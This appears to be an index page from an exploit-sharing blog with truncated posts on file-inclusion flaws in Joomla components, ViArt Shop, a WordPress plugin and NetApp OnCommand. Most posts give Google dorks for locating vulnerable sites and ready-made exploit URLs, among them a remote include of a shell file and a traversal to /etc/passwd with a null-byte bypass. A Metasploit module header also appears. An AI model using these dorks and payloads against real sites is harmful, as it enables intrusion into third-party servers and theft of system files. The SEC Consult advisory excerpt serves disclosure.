17 May 2013 - Source: http://www.mondounix.com
Title : Joomla x-shop <= 1.7 Remote File Include Vulnerability
--------------------------------------------------------------------------------
#Author: Crackers_Child
#cont@ct: crackers_child@sibersavascilar.com
--------------------------------------------------------------------------------
Google Dorks : allinurl:"/com_x-shop/"
--------------------------------------------------------------------------------
Download : http://mamboxchange.com/frs/?group_id=187&release_id=1047
--------------------------------------------------------------------------------
Bug in admin.x-shop.php
<?
include($mosConfig_absolute_path.'/administrator/components/com_x-shop/languages/'.$mosConfig_lang.'.php');
session_start();
--------------------------------------------------------------------------------
Exploit:
http://www.site.com/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=Shell.txt?
--------------------------------------------------------------------------------
greets:
All...
Posted in 0day, component, exploit, FILE INCLUSION, joomla, linux, local, MondoUnix, PHP, remote, Security, Sicurezza, unix, Vulnerabilities, Vulnerability, webapps, X-SHOP
9 May 2013 - Source: http://www.mondounix.com
SEC Consult Vulnerability Lab Security Advisory < 20130507-0 >
=======================================================================
title: Multiple vulnerabilities
product: NetApp OnCommand System Manager
vulnerable version: <= 2.1 and <=2.0.2
fixed version: 2.2 (only XSS fixed)
CVE: CVE-2013-3320 (XSS)
CVE-2013-3321 (File inclusion)
CVE-2013-3322 (OS command execution)
impact: medium
homepage: http://www.netapp.com/
found: 2012-11-06
by: M. Heinzl
SEC Consult Vulnerability Lab
https://www.sec-consult.com/
=======================================================================
Vendor...
Posted in 0day, COMMAND EXECUTION, cross site scripting, exploit, FILE INCLUSION, linux, MondoUnix, NETAPP ONCOMMAND, PHP, proof of concept, remote, Security, Sicurezza, system manager, unix, Vulnerabilities, Vulnerability, webapps, XSS
3 January 2013 - Source: http://www.mondounix.com
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::PHPInclude
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'WordPress Plugin Advanced Custom Fields Remote File Inclusion',
      'Description' => %q{
        This module exploits a remote file inclusion flaw in the WordPress blogging
        software...
Posted in 0day, ADVANCED CUSTOM FIELDS, exploit, FILE INCLUSION, linux, metasploit, MondoUnix, PHP, Plugin, Plugins, remote, REMOTE FILE INCLUSIONE, script, Security, Sicurezza, unix, Vulnerabilities, Vulnerability, webapps, WORDPRESS SECURITY, WP-CONTENT
20 December 2012 - Source: http://www.mondounix.com
[!]===========================================================================[!]
[~] Joomla Component ztautolink LFI Vulnerability
[~] Author : Xr0b0t (xrt@gmx.us)
[~] Homepage : http://www.indonesiancoder.com | http://Xr0b0t.name | http://mc-crew.info
[~] Date : 19 Des, 2012
[!]===========================================================================[!]
[ Software Information ]
[+] Vendor : www.zootemplate.com
[+] Price : free
[+] Vulnerability : LFI
[+] Dork : inurl:"com_ztautolink" ;)
[+] Version : N/A
[!]===========================================================================[!]
[ Vulnerable File ]
http://127.0.0.1//index.php?option=com_ztautolink&controller=[r0b0t]
[...
Posted in 0day, component, COM_ZTAUTOLINK, exploit, FILE INCLUSION, joomla, linux, local, MondoUnix, PHP, remote, Security, Sicurezza, unix, Vulnerabilities, Vulnerability, webapps, ZTAUTOLINK
20 December 2012 - Source: http://www.mondounix.com
[!]===========================================================================[!]
[~] Joomla Component bit LFI Vulnerability
[~] Author : Xr0b0t (xrt@gmx.us)
[~] Homepage : http://www.indonesiancoder.com | http://Xr0b0t.name | http://mc-crew.info
[~] Date : 19 Des, 2012
[!]===========================================================================[!]
[ Software Information ]
[+] Vendor : JomLand.com
[+] Price : free
[+] Vulnerability : LFI
[+] Dork : inurl:"com_bit " ;)
[+] Version : N/A
[!]===========================================================================[!]
[ Vulnerable File ]
http://127.0.0.1//index.php?option=com_bit&controller=[r0b0t]
[ Code PHP...
Posted in 0day, bit, component, COM_BIT, exploit, FILE INCLUSION, joomla, linux, local, MondoUnix, PHP, remote, Security, Sicurezza, unix, Vulnerabilities, Vulnerability, webapps
26 September 2012 - Source: http://www.mondounix.com
############################################
### Exploit Title: ViArt Shop Evaluation v4.1 Multiple Remote File Inclusion Vulnerability
### Date: 26/9/2012
### Author: L0n3ly-H34rT
### Contact: l0n3ly_h34rt@hotmail.com
### My Site: http://se3c.blogspot.com/
### Vendor Link: http://www.viart.com/
### Software Link: http://www.viart.com/downloads/viart_shop-4.1.zip
### Version: 4.1
### Tested on: Linux/Windows
############################################
# Affected files :
1- ( /admin/admin_header.php ) on line 13 :
include_once($root_folder_path . "messages/" . $language_code . "/cart_messages.php");
2- ( /includes/ajax_list_tree.php ) on line 29 :
include_once($root_folder_path...
Posted in 0day, exploit, FILE INCLUSION, fli, linux, MondoUnix, PHP, remote, Security, Sicurezza, unix, VIART SHOP EVALUATION, Vulnerabilities, Vulnerability, webapps
20 July 2012 - Source: http://www.mondounix.com
#################################################################################
# Title : Joomla Component com_hello Local File Include
#
# Author : Ajax Security Team
#
# Discovered By : devilzc0der & Dominator
#
# Dork : inurl:"com_hello"
#
# h0m3 : www.ajaxtm.com
#
# Software Link : www.joomla.com
#
# Level : High
##################################################################################
# p0c :
# com_hello&controller=../../../../../../../../etc/passwd%00
#
# Please Use Null Byte ( %00 ) for Bypass.
##################################################################################
# 3xample :
#
http://SITE/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
#
###################################################################################
#...
Posted in 0day, exploit, FILE INCLUSION, joomla, linux, local, MondoUnix, PHP, remote, Security, Sicurezza, unix, Vulnerabilities, Vulnerability, webapps